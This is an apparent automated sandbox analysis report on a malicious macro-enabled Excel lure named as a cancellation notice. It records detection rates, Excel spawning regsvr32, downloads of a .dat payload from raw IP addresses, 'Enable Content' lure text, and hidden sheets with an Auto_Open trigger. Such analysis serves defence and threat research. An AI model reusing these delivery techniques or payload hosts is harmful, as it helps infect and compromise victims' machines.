Source: Cancellation_1844611233_06082021.xlsm |
Virustotal: Detection: 26% |
Source: Cancellation_1844611233_06082021.xlsm |
ReversingLabs: Detection: 32% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80 |
Source: Joe Sandbox View |
IP Address: 51.89.115.125 |
Source: global traffic |
HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61190FA7.tif |
Source: regsvr32.exe, 00000003.00000002.2173436473.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2174040381.0000000001E50000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2175172538.0000000001DA0000.00000002.00000001.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing button from the yellow bar above 19 Once you have enabled editing, please click En |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content button from the yellow bar above 20 21 22 23 24 25 26 27 28 29 30 31 32 |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable Content button from the yellow bar above |
Source: workbook.xml |
Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4B72C346-643F-4012-BBC8-4BEF893AE02B}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" 
r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64 |